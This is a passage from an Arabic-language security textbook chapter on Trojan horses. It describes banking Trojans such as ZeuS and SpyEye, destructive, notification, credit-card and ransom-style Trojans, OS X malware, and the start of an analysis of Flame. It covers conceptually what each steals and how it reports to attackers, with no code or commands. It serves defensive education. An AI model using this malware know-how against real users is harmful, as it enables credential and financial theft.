‫واﻟذى ﯾﻌﺗﻣد ﻋﻠﻰ اﺳﺗﺧدام ﻛﻠﻣﺔ ﻣرور واﺣده‪ .‬طروادة اﻟﻣﺻرﻓﻲ ﯾﮭﺎﺟم اﻟﺧدﻣﺎت اﻟﻣﺻرﻓﯾﺔ ﻋﺑر اﻹﻧﺗرﻧت اﻟﮭدف اﻟﺗﻲ ﺗﻌﺗﻣد ﻋﻠﻰ ‪.TAN‬‬
‫ﻋﻧدﻣﺎ ﯾﺗم إدﺧﺎل ‪ ،TAN‬ﻓﺎن اﻟﺗروﺟﺎن ﯾﺳﺗوﻟﻰ ﻋﻠﻰ اﻟرﻗم ﺛم ﯾﻘوم ﺑﺗﻐﯾر ھذا اﻟرﻗم ﻣﻊ أي رﻗم ﻋﺷواﺋﻲ ﻏﯾر ﺻﺣﯾﺢ وﻣرﻓوض ﻣن ﻗﺑل‬
‫اﻟﺑﻧك‪ .‬ﯾﺗم ﻓﻠﺗرة اﻟﻣﺣﺗوى ﻣن ﻗﺑل طروادة وﯾﺗم اﺳﺗﺑدال اﻟرﻗم اﻟﻐﯾر ﺻﺣﯾﺢ ﻣن أﺟل إرﺿﺎء اﻟﮭدف‪ .‬ﯾﻣﻛن ﻟﻠﻣﮭﺎﺟم إﺳﺎءة اﺳﺗﺧدام اﻋﺗراض‬
‫‪ TAN‬ﻣﻊ ﺗﻔﺎﺻﯾل دﺧول اﻟﮭدف‪.‬‬
‫‪ :HTML Injection‬ھذا اﻟﻧوع ﻣن طروادة ﯾﺧﻠﻖ ﺣﻘول ﻣﻛررة ﻋﻠﻰ ﻣواﻗﻊ اﻟﺧدﻣﺎت اﻟﻣﺻرﻓﯾﺔ ﻋﺑر اﻹﻧﺗرﻧت وﺗﺳﺗﺧدم ھذه اﻟﺣﻘول‬
‫اﻻﺿﺎﻓﯾﺔ ﻣن ﻗﺑل اﻟﻣﮭﺎﺟم ﻟﺟﻣﻊ ﺗﻔﺎﺻﯾل ﺣﺳﺎب اﻷھداف ‪ ،‬رﻗم ﺑطﺎﻗﺔ اﻻﺋﺗﻣﺎن‪ ،‬ﺗﺎرﯾﺦ اﻟﻣﯾﻼد‪ ،‬اﻟﺦ‪ .‬اﻟﻣﮭﺎﺟﻣون ﯾﻣﻛن اﺳﺗﺧدام ھذه اﻟﻣﻌﻠوﻣﺎت‬
‫ﻻﻧﺗﺣﺎل واﺧﺗراق اﻟﺣﺳﺎب اﻟﮭدف‪.‬‬
‫‪ :Form Grabber‬ھذا ھو وﺳﯾﻠﺔ ﻣﺗﻘدﻣﺔ ﻟﺟﻣﻊ اﻟﺑﯾﺎﻧﺎت ﻣن اﻹﻧﺗرﻧت اﻟﻣﺗﺎﺣﺔ ﻓﻲ ﻣﺧﺗﻠف اﻟﻣﺗﺻﻔﺣﺎت‪ .‬ھذه ﻓﻌﺎﻟﺔ ﻟﻠﻐﺎﯾﺔ ﻓﻲ ﺟﻣﻊ ‪ID‬‬
‫اﻟﮭدف‪ ،‬وﻛﻠﻣﺎت اﻟﺳر‪ ،‬وﻏﯾرھﺎ ﻣن اﻟﻣﻌﻠوﻣﺎت اﻟﺣﺳﺎﺳﺔ‪.‬‬
‫‪E-Banking Trojan: ZeuS and SpyEye‬‬

‫‪ZeuS‬‬
‫ﻣﺻدر ھذا اﻟﺗﻘرﯾر‪http://www.secureworks.com :‬‬
‫‪ ZeuS‬ھو أﺣدث ﺗﮭدﯾد ﻟﻠﻣﻌﺎﻣﻼت اﻟﻣﺻرﻓﯾﺔ ﻋﺑر اﻹﻧﺗرﻧت ﻛﻣﺎ أﻧﮫ ﯾﺳﺗﺧدم ﻛل ﻣن ﺷﻛﻠﻲ ‪ Grabber‬وﻛذﻟك ﯾﻘوم ﺑﺗﺳﺟﯾل ﺿرﺑﺎت‬
‫اﻟﻣﻔﺎﺗﯾﺢ‪ .‬ﯾﻧﺗﺷر ﺑﺷﻛل رﺋﯾﺳﻲ ﻣن ﺧﻼل اﻟﺗﺣﻣﯾل وﻣﺧططﺎت اﻻﺣﺗﯾﺎل‪Zeus botnet .‬ﯾﺳﺗﮭدف ﻓﻘط اﻟوﯾﻧدوز‪ .‬اﻟﻧﺳﺧﺔ اﻟﺟدﯾدة ﻣن ‪ZeuS‬‬
‫ﺗؤﺛر ﺣﺗﻰ ﻋﻠﻰ ﻧظﺎم اﻟﺗﺷﻐﯾل ‪ .Windows Vista‬ﺗطورت ﻣﻊ ﻣرور اﻟوﻗت‪ ،‬وﺗﺷﻣل ﺗرﺳﺎﻧﺔ ﻛﺎﻣﻠﺔ ﻣن اﻟﻘدرات ﻟﺳرﻗﺔ اﻟﻣﻌﻠوﻣﺎت‪:‬‬
‫‪ -‬ﯾﺳرق اﻟﺑﯾﺎﻧﺎت اﻟﻣﻘدﻣﺔ ﻓﻲ أﺷﻛﺎل ‪.HTTP‬‬
‫‪ -‬ﯾﺳرق ﺣﺳﺎب ﺑﯾﺎﻧﺎت اﻻﻋﺗﻣﺎد اﻟﻣﺧزﻧﺔ ﻓﻲ ‪.Windows Protected Storage‬‬
‫‪ -‬ﯾﺳرق ‪ X509‬واﻟﺗﻲ ھﻲ ﻋﺑراه ﻋن ﺷﮭﺎدة اﻟﻌﻣﯾل ﻟﻠﻣﻔﺗﺎح اﻟﻌﺎم )‪ (PKI‬اﻟﺧﺎص ﺑﻧظﺎم اﻟﺗﺷﻔﯾر ‪.https‬‬
‫‪ -‬ﯾﺳرق ﺣﺳﺎب ‪ FTP‬وﺣﺳﺎب ‪.POP‬‬
‫‪ -‬ﯾﺳرق‪/‬ﯾﺣذف ‪ HTTP cookies‬و‪.Flash cookies‬‬
‫‪ -‬ﺗﻌدﯾل ﺻﻔﺣﺎت ‪ HTML‬ﻣن اﻟﻣواﻗﻊ اﻟﻣﺳﺗﮭدﻓﺔ ﻷﻏراض ﺳرﻗﺔ اﻟﻣﻌﻠوﻣﺎت‪.‬‬
‫‪ -‬ﯾﻌﯾد ﺗوﺟﯾﮫ اﻟﺿﺣﺎﯾﺎ ﻣن ﺻﻔﺣﺎت اﻟوﯾب اﻟﮭدف اﻟﻰ ﺗﻠك اﻟﺗﻲ ﯾﺳﯾطر ﻋﻠﯾﮭﺎ اﻟﻣﮭﺎﺟم‪.‬‬
‫‪ -‬ﯾﺄﺧذ ﻟﻘطﺎت و‪ scraps‬ﻠ ‪ HTML‬ﻣن اﻟﻣواﻗﻊ اﻟﻣﺳﺗﮭدﻓﺔ‪.‬‬
‫‪ -‬اﻟﺑﺣث ﻋن وﺗﺣﻣﯾل اﻟﻣﻠﻔﺎت ﻣن ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﻣﺻﺎب‪.‬‬
‫‪ -‬ﯾﻌدل ﻣﻠف اﻟﻣﺿﯾﻔﯾن اﻟﻣﺣﻠﻲ)‪.(%systemroot%\system32\drivers\etc\hosts) (local host file‬‬

‫‪523‬‬
‫‪ -‬ﯾﺣﻣل وﯾﻧﻔذ ‪.arbitrary programs‬‬

‫‪ -‬ﺣذف ‪ registry keys‬اﻟﺣﺎﺳﻣﺔ‪ ،‬ﻣﻣﺎ ﯾﺟﻌل اﻟﻛﻣﺑﯾوﺗر ﻏﯾر ﻗﺎدر ﻋﻠﻰ اﻟﺗﻣﮭﯾد ﻓﻲ وﯾﻧدوز‪.‬‬
‫‪SpyEye‬‬
‫‪ SpyEye‬ھﻲ ﺑرﻣﺟﯾﺎت ﺧﺑﯾﺛﺔ اﻟﺗﻲ ﯾﺗم اﺳﺗﺧداﻣﮭﺎ ﻣن ﻗﺑل اﻟﻣﮭﺎﺟم ﻟﺳرﻗﺔ اﻟﻣﺎل ﻣن اﻟﺣﺳﺎﺑﺎت اﻟﻣﺻرﻓﯾﺔ ﻋﻠﻰ اﻻﻧﺗرﻧت اﻟﻣﺳﺗﮭدﻓﺔ‪ .‬ﻓﻲ‬
‫اﻟواﻗﻊ‪ ،‬ھذا ‪ botnet‬ﻣﻊ ﺷﺑﻛﺔ ﻣن ﺧوادم اﻟﻘﯾﺎدة واﻟﺳﯾطرة‪ .‬ھذا ﯾؤدي ﺗﻠﻘﺎﺋﯾﺎ ﻋﻧد ﺑدء اﻟﮭدف اﻟﻘﯾﺎم ﺑﺑﻌض اﻟﻣﻌﺎﻣﻼت‪ ،‬وﺣﺗﻰ ﯾﻣﻛﻧﮫ ﻣﻧﻊ‬
‫اﻟﻣﻌﺎﻣﻼت ﻓﻲ اﻟﺑﻧك‪.‬‬
‫‪Destructive Trojans: M4sT3r Trojan‬‬
‫‪ M4sT3r Trojan‬ھو ﺗروﺟﺎن ﺻﻣم ﺧﺻﯾﺻﺎ ﻟﺗدﻣﯾر أو ﺣذف اﻟﻣﻠﻔﺎت ﻣن ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﺿﺣﯾﺔ‪ .‬ﯾﺗم ﺣذف اﻟﻣﻠﻔﺎت ﺗﻠﻘﺎﺋﯾﺎ ﻣن ﻗﺑل‬
‫ﺣﺻﺎن طروادة‪ ،‬واﻟﺗﻲ ﯾﻣﻛن أن ﯾﺳﯾطر ﻋﻠﯾﮭﺎ اﻟﻣﮭﺎﺟم أو ﻣﺑرﻣﺞ ﻣﺳﺑﻘﺎ ﻣﺛل ‪ logic bomb‬ﻷداء ﻣﮭﻣﺔ ﻣﻌﯾﻧﺔ ﻓﻲ وﻗت وﺗﺎرﯾﺦ ﻣﻌﯾن‪.‬‬
‫ﻋﻧدﻣﺎ ﯾﺗم ﺗﺷﻐﯾﻠﮫ‪ ،‬ﻓﺎن ھذا اﻟﺗروﺟﺎن ﯾﻘوم ﺑﺗدﻣﯾر ﻧظﺎم اﻟﺗﺷﻐﯾل‪ .‬اﻟﺿﺣﯾﺔ ﻻ ﯾﻣﻛﻧﮫ ﺗﻣﮭﯾد ﻧظﺎم اﻟﺗﺷﻐﯾل‪ .‬ھذا اﻟطروادة ﯾﻘوم ‪ format‬ﻟﻛﺎﻓﺔ‬
‫ﻣﺣرﻛﺎت اﻷﻗراص اﻟﻣﺣﻠﯾﺔ واﻟﺷﺑﻛﺔ‪.‬‬
‫‪Notification Trojans‬‬
‫‪ Notification Trojans‬ﯾرﺳل ﻋﻧوان ‪ IP‬ﻟﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﺿﺣﯾﺔ إﻟﻰ اﻟﻣﮭﺎﺟم‪ .‬وذﻟك ﻋﻧدﻣﺎ ﯾﺑدا ﻋﻣل ﻧظﺎم اﻟﺿﺣﯾﺔ‪Notification ،‬‬
‫‪ Trojans‬ﯾﻘوم ﺑﺈﻋﻼم اﻟﻣﮭﺎﺟم‪ .‬ﺑﻌض ﻣن اﻹﺧطﺎرات اﻟﺗﻲ ﯾﻌﻠﻣﮭﺎ ﻟﻠﻣﮭﺎﺟم ﻛﺎﻻﺗﻰ‪:‬‬
‫‪ :SIN Notification -‬ﯾﺧطر ﻣﺑﺎﺷرة ﺧﺎدم اﻟﻣﮭﺎﺟم‪.‬‬
‫‪ :ICQ Notification -‬ﯾﺧطر اﻟﻣﮭﺎﺟم ﺑﺎﺳﺗﺧدام ﻗﻧوات ‪.ICQ‬‬
‫‪524‬‬
‫‪ :PHP Notification‬ﯾرﺳل اﻟﺑﯾﺎﻧﺎت ﻣن ﺧﻼل رﺑطﮭﺎ إﻟﻰ ﺧﺎدم ‪ PHP‬ﻋﻠﻰ ﺧﺎدم اﻟﻣﮭﺎﺟم‪.‬‬ ‫‪-‬‬
‫‪ :Email Notification‬ﯾرﺳل إﺧطﺎر ﻋن طرﯾﻖ اﻟﺑرﯾد اﻻﻟﻛﺗروﻧﻲ‪.‬‬ ‫‪-‬‬
‫‪ :Net Send‬ﯾﺗم إرﺳﺎل اﻻﺧطﺎر ﻣن ﺧﻼل اﻷﻣر ‪.net send‬‬ ‫‪-‬‬
‫‪ :CGI Notification‬ﯾرﺳل اﻟﺑﯾﺎﻧﺎت ﻣن ﺧﻼل رﺑطﮭﺎ إﻟﻰ ﺧﺎدم ‪ PHP‬ﻋﻠﻰ ﺧﺎدم اﻟﻣﮭﺎﺟم‪.‬‬ ‫‪-‬‬
‫‪ :IRC notification‬ﯾﺧطر اﻟﻣﮭﺎﺟم ﺑﺎﺳﺗﺧدام ﻗﻧوات ‪.IRC‬‬ ‫‪-‬‬
‫‪Credit Card Trojans‬‬
‫‪ ، Credit card Trojans‬ﺑﻣﺟرد أن ﯾﺗم ﺗﺛﺑﯾﺗﮭﺎ ﻋﻠﻰ ﻧظﺎم اﻟﺿﺣﯾﺔ‪ ،‬ﻓﺈﻧﮭﺎ ﺗﻘوم ﺑﺟﻣﻊ ﻣﺧﺗﻠف ﺗﻔﺎﺻﯾل ﻣﺛل أرﻗﺎم ﺑطﺎﻗﺎت اﻻﺋﺗﻣﺎن‪ ،‬وأﺣدث‬
‫ﺗﻔﺎﺻﯾل اﻟﻔواﺗﯾر‪ ،‬اﻟﺦ ﺛم ﯾﺗم إﻧﺷﺎء ﻧﻣوذج ﺗﺳﺟﯾل اﻟﺧدﻣﺎت اﻟﻣﺻرﻓﯾﺔ ﻋﺑر اﻹﻧﺗرﻧت وھﻣﯾﺔ ﺣﯾث أﻧﮭﺎ ﺗﺟﻌل ﻣﺳﺗﺧدم ﺑطﺎﻗﺔ اﻻﺋﺗﻣﺎن ﯾﻌﺗﻘد أن‬
‫ﻣﻌﻠوﻣﺎت اﻟﺑﻧك ھذه ﺣﻘﯾﻘﯾﮫ‪ .‬ﺑﻣﺟرد دﺧول اﻟﻣﺳﺗﺧدم ﻋﻠﻰ اﻟﻣﻌﻠوﻣﺎت اﻟﻣطﻠوﺑﺔ‪ ،‬ﻓﺎن اﻟﻣﮭﺎﺟﻣﯾن ﯾﻘوﻣون ﺑﺟﻣﻊ اﻟﻣﻌﻠوﻣﺎت واﺳﺗﺧدام ﺑطﺎﻗﺔ‬
‫اﻻﺋﺗﻣﺎن ﻟﻼﺳﺗﺧدام اﻟﺷﺧﺻﻲ دون ﻋﻠم اﻟﺿﺣﯾﺔ‪.‬‬
‫‪ Credit card Trojans‬ﯾﺳرق اﻟﺑﯾﺎﻧﺎت اﻻﺋﺗﻣﺎﻧﯾﺔ اﻟﻣﺗﻌﻠﻘﺔ ﺑﺑطﺎﻗﺔ اﻟﺿﺣﺎﯾﺎ ﻣﺛل رﻗم اﻟﺑطﺎﻗﺔ‪ ،CVV2s ،‬وﺗﻔﺎﺻﯾل اﻟﻔواﺗﯾر‪ .‬ﺣﺻﺎن‬
‫طروادة ھذه ﺗﺧدع اﻟﻣﺳﺗﺧدﻣﯾن إﻟﻰ زﯾﺎرة ﻣواﻗﻊ اﻟﻣﺻرﻓﯾﺔ اﻹﻟﻛﺗروﻧﯾﺔ اﻟوھﻣﯾﺔ وإدﺧﺎل اﻟﻣﻌﻠوﻣﺎت اﻟﺷﺧﺻﯾﺔ‪ .‬ﻣﻠﻘﻣﺎت‪/‬ﺧوادم طروادة ﻧﻘوم‬
‫ﺑﻧﻘل اﻟﺑﯾﺎﻧﺎت اﻟﻣﺳروﻗﺔ ﻟﻠﻘراﺻﻧﺔ ﻋن ﺑﻌد ﺑﺎﺳﺗﺧدام اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ‪ ،IRC ،FTP ،‬أو أي ﻣن اﻟوﺳﺎﺋل اﻷﺧرى‪.‬‬
‫)‪Data Hiding Trojans (Encrypted Trojans‬‬
‫‪ Encryption Trojans‬ﯾﻘوم ﺑﺗﺷﻔﯾر اﻟﺑﯾﺎﻧﺎت ﻋﻠﻰ ﺟﮭﺎز ﻛﻣﺑﯾوﺗر اﻟﺿﺣﯾﺔ وﯾﺟﻌل اﻟﺑﯾﺎﻧﺎت ﻛﺎﻣﻠﺔ ﻏﯾر ﺻﺎﻟﺣﺔ ﻟﻼﺳﺗﻌﻣﺎل‪" :‬اﻟﻛﻣﺑﯾوﺗر‬
‫اﻟﺧﺎص ﺑك ﻗد ﻗﺎم ﺑﺗﺷﻐﯾل ﺑراﻣﺟﻧﺎ أﺛﻧﺎء ﺗﺻﻔﺢ اﻟﺻﻔﺣﺎت اﻟﻐﯾر ﻣﺷروﻋﺔ ﻟﻠﻣواﻗﻊ اﻻﺑﺎﺣﯾﺔ‪ ،‬ﺟﻣﯾﻊ اﻟﻣﺳﺗﻧدات اﻟﺧﺎﺻﺔ ﺑك‪ ،‬وﻣﻠﻔﺎت اﻟﻧص‬
‫وﻗواﻋد اﻟﺑﯾﺎﻧﺎت ﻓﻲ اﻟﻣﺟﻠد ‪ Document‬ﺗم ﺗﺷﻔﯾرھﺎ ﻣﻊ ﻛﻠﻣﺔ ﻣرور ﻣﻌﻘدة"‪ .‬اﻟﻣﮭﺎﺟﻣون ﯾطﺎﻟﺑون ﺑﻔدﯾﺔ أو ﯾﺟﺑروا اﻟﺿﺣﺎﯾﺎ ﻟﻠﻘﯾﺎم ﺑﻌﻣﻠﯾﺎت‬
‫اﻟﺷراء ﻣن ‪ drugstore‬اﻟﺧﺎص ﺑﮭم ﻋﻠﻰ اﻻﻧﺗرﻧت ﻣﻘﺎﺑل ﻛﻠﻣﺔ اﻟﺳر ﻟﻔﺗﺢ اﻟﻣﻠﻔﺎت "ﻻ ﺗﺣﺎول اﻟﺑﺣث ﻋن اﻟﺑرﻧﺎﻣﺞ اﻟذي ﯾﻘوم ﺑﺗﺷﻔﯾر‬
‫اﻟﻣﻌﻠوﻣﺎت اﻟﺧﺎﺻﺔ ﺑك ‪-‬اﻧﮭﺎ ﺑﺑﺳﺎطﺔ ﻏﯾر ﻣوﺟودة ﻓﻲ اﻟﻘرص اﻟﺛﺎﺑت ﺑﻌد اﻵن‪ "،‬ﺗدﻓﻊ ﻟﻧﺎ اﻟﻣﺎل ﻟﻔﺗﺢ ﻛﻠﻣﺔ اﻟﻣرور"‪ .‬ھذا ﯾﻣﻛن ﻓك ﺗﺷﻔﯾرھﺎ‬
‫ﻓﻘط ﻣن ﻗﺑل اﻟﻣﮭﺎﺟم‪ ،‬اﻟذي ﯾطﺎﻟب اﻟﻣﺎل‪ ،‬أو أﻧﮭﺎ ﯾﻣﻛن إﺟﺑﺎر اﻟﻣﺳﺗﺧدم ﻋﻠﻰ اﻟﺷراء ﻣﻊ ﻋدد ﻗﻠﯾل ﻓﻲ اﻟﻣواﻗﻊ ﻟﻔك اﻟﺗﺷﻔﯾر‪.‬‬

‫‪525‬‬
‫‪OS X Trojan: Crisis‬‬
‫‪ OSX.Crisis‬ھو ﺣﺻﺎن طروادة اﻟذي ﯾﺳرق اﻟﻣﻌﻠوﻣﺎت اﻟﺗﻲ ﻗد ﺗﻛون ﺣﺳﺎﺳﺔ ﻋﻠﻰ ﻧظﺎم اﻟﺿﺣﯾﺔ وﯾﻔﺗﺢ ‪ backdoor‬ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر‬
‫)ﻧظﺎم اﻟﺿﺣﯾﺔ( ﻟﻠﮭﺟﻣﺎت ﻓﻲ اﻟﻣﺳﺗﻘﺑل‪.‬‬
‫ﻋﻧدﻣﺎ ﯾﺗم ﺗﻧﻔﯾذ ﺣﺻﺎن طروادة‪ ،‬ﻓﺈﻧﮫ ﯾﺧﻠﻖ اﻟﻣﺟﻠدات واﻟﻣﻠﻔﺎت اﻟﺗﺎﻟﯾﺔ‪:‬‬
‫ﻓﯾﻣﺎ ﯾﻠﻲ اﻹﺟراءات اﻟﺗﻲ ﯾﺗم ﺗﻧﻔﯾذھﺎ ﻣن ﻗﺑل‪: OSX.Crisis‬‬

‫‪ -‬ﻣراﻗﺑﺔ ﺣرﻛﺔ ﻣرور ‪.Skype audio‬‬
‫‪ -‬رﺻد ‪ Safari‬أو ﻓﺎﯾرﻓوﻛس ﻟﺗﺳﺟﯾل اﻟﻣواﻗﻊ واﻟﺗﻘﺎط ﻟﻘطﺎت‪.‬‬
‫‪ -‬ﺗﺳﺟﯾل اﻟﻣﺣﺎدﺛﺎت ﻓﻲ‪ MS Messenger‬و‪.Adium‬‬
‫‪ -‬إرﺳﺎل اﻟﻣﻠﻔﺎت إﻟﻰ ﺧﺎدم ‪.command and control server‬‬
‫‪MAC OS X Trojan: DNSChanger‬‬
‫اﻟﺑرﻣﺟﯾﺎت اﻟﺧﺑﯾﺛﺔ ﺗﻘوم ﺑﺗﻌدﯾل إﻋدادات ‪ DNS‬ﻟﻠﺷﺑﻛﺔ اﻟﻧﺷطﺔ‪ .‬ﻓﻲ ﺑﻌض اﻻوﻗﺎت ﯾﺿطر اﻟﻣﺳﺗﺧدﻣﯾن إﻟﻰ ﺗﺣﻣﯾل ﺑراﻣﺞ ‪ codecs‬أو ﻏﯾرھﺎ‬
‫ﻣن ﻣﻠﻔﺎت اﻷﻓﻼم اﻟﺗﻲ ﯾﺗم ﺗﻧزﯾﻠﮭﺎ ﻣن ﺧﻼل ﻛوﯾك ﺗﺎﯾم‪ ،‬اﻟﺦ‪ .‬ﺑﻣﺟرد اﻻﻧﺗﮭﺎء ﻣن اﻟﺗﺣﻣﯾل‪ ،‬ﻓﺎن اﻟﺗروﺟﺎن ﯾﺑدا اﻟﮭﺟوم‪ ،‬ﻣﻣﺎ ﯾﺟﻌل اﻟوﺻول إﻟﻰ‬
‫اﻹﻧﺗرﻧت ﺑطﻲء‪ ،‬اﻹﻋﻼﻧﺎت ‪ ads‬اﻟﺗﻲ ﻟﯾس ﻟﮭﺎ ﻟزوم ﺗظﮭر ﻋﻠﻰ ﺷﺎﺷﺔ اﻟﻛﻣﺑﯾوﺗر‪ ،‬وﻣﺎ إﻟﻰ ذﻟك‪ .‬ﯾﺳﺗﺧدم طروادة ﺗﻘﻧﯾﺎت اﻟﮭﻧدﺳﺔ اﻻﺟﺗﻣﺎﻋﯾﺔ‬
‫ﻟﺟﻌل اﻟﻣﺳﺗﺧدﻣﯾن ﯾﻘوﻣون ﺑﺗﺣﻣﯾل اﻟﺑراﻣﺞ وﺗﺷﻐﯾل اﻟﺗﻌﻠﯾﻣﺎت اﻟﺑرﻣﺟﯾﺔ اﻟﺿﺎرة‪.‬‬

‫‪526‬‬
‫ﺑﻌد ﻗﯾﺎم اﻟﻣﺳﺗﺧدم ﺑﺗﺣﻣﯾل ﺑرﻧﺎﻣﺞ اﻟﻛودك اﻟﻣزﯾف‪ ،‬ﻓﺎن ﻋﻣﻠﯾﺔ ﺧداع واﺳﺗرﺟﺎع اﻟﻣﻌﻠوﻣﺎت اﻟﺧﺎﺻﺔ ﺑﺎﻟﻣﺳﺗﺧدم ﺗﻛون ﻋﻠﻰ اﻟﻧﺣو اﻟﺗﺎﻟﻲ‪:‬‬
‫‪ :DNS settings -‬ﯾﺗم ﺗﻐﯾﯾر إﻋدادات ‪ DNS‬اﻟﺟﮭﺎز اﻟﻣﺣﻠﻲ إﻟﻰ ﻋﻧوان ‪ IP‬اﻟﻣﮭﺎﺟم‪.‬‬
‫‪ :Playing a video -‬ﺑﻌد ﺗﺛﺑﯾت ﺑرﻧﺎﻣﺞ اﻟﻛودك اﻟﻣزﯾف‪ ،‬ﻓﺎﻧﮫ ﯾﺗم ﺗﺷﻐﯾل ﺷرﯾط ﻓﯾدﯾو ﺣﺗﻰ ﻻ ﺗﺛﯾر اﻟﺷﻛوك‪.‬‬
‫‪ :HTTP message -‬ﯾﺗم إرﺳﺎل إﺧطﺎر إﻟﻰ اﻟﻣﮭﺎﺟم ﻋن اﻟﺟﮭﺎز اﻟﺿﺣﯾﺔ ﺑﺎﺳﺗﺧدام ‪.HTTP post message‬‬
‫‪ :Complete control -‬اﻟﻘراﺻﻧﺔ ﯾﻣﻛﻧﮭم ﻓرض اﻟﺳﯾطرة اﻟﻛﺎﻣﻠﺔ ﻋﻠﻰ ‪ MAC OS X‬ﺟﮭﺎز ﻛﻣﺑﯾوﺗر اﻟﺿﺣﯾﺔ‪.‬‬
‫‪MAC OS X Trojan: Hell Raiser‬‬
‫‪ Hell Raiser‬ھﻲ ﺑراﻣﺞ ﺿﺎرة اﻟﺗﻲ ﺗﺻل إﻟﻰ ﻧظﺎم اﻟﺿﺣﯾﺔ ﻋﻧد اﻟﻧﻘر ﻋﻠﯾﮭﺎ‪ .‬ﺑﻣﺟرد ﺗﻣﻛﻧﮭﺎ ﻣن اﻟوﺻول إﻟﻰ ﻧظﺎم اﻟﺿﺣﯾﺔ‪ ،‬ﻓﺎﻧﮫ ﯾﻣﻛن‬
‫ﻟﻠﻣﮭﺎﺟم إرﺳﺎل اﻟﺻور ورﺳﺎﺋل اﻟدردﺷﺔ اﻟﻣﻧﺑﺛﻘﺔ‪ ،‬ﯾﻣﻛن ﻧﻘل اﻟﻣﻠﻔﺎت ﻣن وإﻟﻰ ﻛﻣﺑﯾوﺗر اﻟﺿﺣﯾﺔ‪ ،‬وﺣﺗﻰ ﯾﻣﻛﻧﮫ ﻏﻠﻖ او إﻋﺎدة ﺗﺷﻐﯾل اﻟﻧظﺎم ﻋن‬
‫ﺑﻌد‪ .‬وأﺧﯾرا‪ ،‬ﻋﻣﻠﯾﺎت اﻟﺿﺣﯾﺔ ﯾﻣﻛن رﺻدھﺎ‪.‬‬

‫‪527‬‬
‫‪Trojan Analysis‬‬
‫‪Trojan Analysis: Flame‬‬

‫اﻟﻣﺻدر‪http://www.kaspersky.com :‬‬
‫‪ ,Flame‬ﯾﻌرف أﯾﺿﺎ ﺑﺎﺳم ‪ sKyWlper ،Flamer‬أو ‪ ،Skywiper‬وھﻰ ﺑرﻣﺟﯾﺎت ﺧﺑﯾﺛﺔ )‪ (modular computer malware‬واﻟﺗﻲ‬
‫ﺗﮭﺎﺟم أﺟﮭزة اﻟﻛﻣﺑﯾوﺗر اﻟﺗﻲ ﺗﻌﻣل ﺑﻧظﺎم اﻟﺗﺷﻐﯾل ﻣﺎﯾﻛروﺳوﻓت وﯾﻧدوز‪ .‬ﯾﺗم اﺳﺗﺧدام ھذه اﻟﺑرﻣﺟﯾﺎت اﻟﺧﺑﯾﺛﺔ ﻻﺳﺗﮭداف اﻟﺗﺟﺳس اﻟﺳﯾﺑراﻧﻲ‬
‫)‪ .(cyber espionage‬ﯾﻣﻛﻧﮫ أن ﯾﻧﺗﺷر إﻟﻰ اﻷﻧظﻣﺔ اﻷﺧرى ﻋﺑر اﻟﺷﺑﻛﺔ اﻟﻣﺣﻠﯾﺔ )‪ (LAN‬أو ﻋن طرﯾﻖ ‪ .USB‬وﯾﻣﻛن ﺗﺳﺟﯾل اﻟﺻوت‪،‬‬
‫ﻟﻘطﺎت‪ ،screenshot‬وﻧﺷﺎط ﻟوﺣﺔ اﻟﻣﻔﺎﺗﯾﺢ‪ ،‬وﺷﺑﻛﺔ اﻟﻣرور‪ .‬ﻓﺈﻧﮫ ﯾﺳﺟل أﯾﺿﺎ ﻣﺣﺎدﺛﺎت ﺳﻛﺎﯾب وﯾﻣﻛن أن ﺗﺗﺣول أﺟﮭزة اﻟﻛﻣﺑﯾوﺗر اﻟﻣﺻﺎﺑﺔ‬
‫إﻟﻰ ﻣﻧﺎرات ﺑﻠوﺗوث اﻟﺗﻲ ﺗﺣﺎول ﺗﺣﻣﯾل ﻣﻌﻠوﻣﺎت اﻻﺗﺻﺎل ﻣن اﻷﺟﮭزة اﻟﺗﻲ ﺗدﻋم ﺗﻘﻧﯾﺔ ‪ Bluetooth‬اﻟﻘرﯾﺑﺔ‪ .‬اﻟرﺳم اﻟﺑﯾﺎﻧﻲ اﻟﺗﺎﻟﻲ ﯾﺻور‬
‫ﻛﯾف ﯾﻧﺟﺢ ﻣﮭﺎﺟم ﻓﻲ ﺗرﻛﯾب ‪ Flame‬ﻋﻠﻰ ﻧظﺎم اﻟﺿﺣﯾﺔ‪.‬‬
‫ﻣن أﺟل ﺣﻘن ﺣﺻﺎن طروادة ﻋﻠﻰ ﻧظﺎم اﻟﺿﺣﯾﺔ واﻟﺣﺻول ﻋﻠﻰ اﻟﻣﻌﻠوﻣﺎت اﻟﺣﺳﺎﺳﺔ‪ ،‬ﯾﺗﻌﯾن ﻋﻠﻰ اﻟﻣﮭﺎﺟﻣﯾن أوﻻ ﺗﻌﯾﯾن ﻣرﻛز اﻟﻘﯾﺎدة‬
‫واﻟﺳﯾطرة )‪ (command and control center‬وﺧﺎدم اﻟﺑرﻣﺟﯾﺎت اﻟﺧﺑﯾﺛﺔ‪ .‬اﻟﺧطوة اﻟﺗﺎﻟﯾﺔ‪ ،‬اﻟﻣﮭﺎﺟم ﯾﻘوم ﺑﺎرﺳﺎل اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ‬
‫اﻻﺣﺗﯾﺎﻟﻲ ﻟﻧظﺎم اﻟﺿﺣﯾﺔ واﻟذي ﯾﻘوم ﺑﺧداﻋﺔ ﻟﻔﺗﺢ اﻟراﺑط‪ .‬ﺑﻣﺟرد ﻗﯾﺎم اﻟﺿﺣﯾﺔ ﺑﻔﺗﺢ اﻟراﺑط‪ ،‬ﻓﺎﻧﮫ ﯾﺗم إﻋﺎدة ﺗوﺟﯾﮫ إﻟﻰ ﺧﺎدم اﻟﺑرﻣﺟﯾﺎت اﻟﺧﺑﯾﺛﺔ‪.‬‬
‫وﻧﺗﯾﺟﺔ ﻟذﻟك‪ ،‬ﯾﺣﺻل ﻋﻠﻰ ﺗﺣﻣﯾل ﺑراﻣﺞ ﺿﺎرة ﻋﻠﻰ ﻧظﺎم اﻟﺿﺣﯾﺔ وإﺻﺎﺑﺔ اﻟﻧظﺎم‪ .‬ھذا اﻟﺟﮭﺎز اﻟﻣﺻﺎب ﯾﺻﯾب اﻷﺟﮭزة اﻷﺧرى اﻟﻣﺗﺻﻠﺔ‬
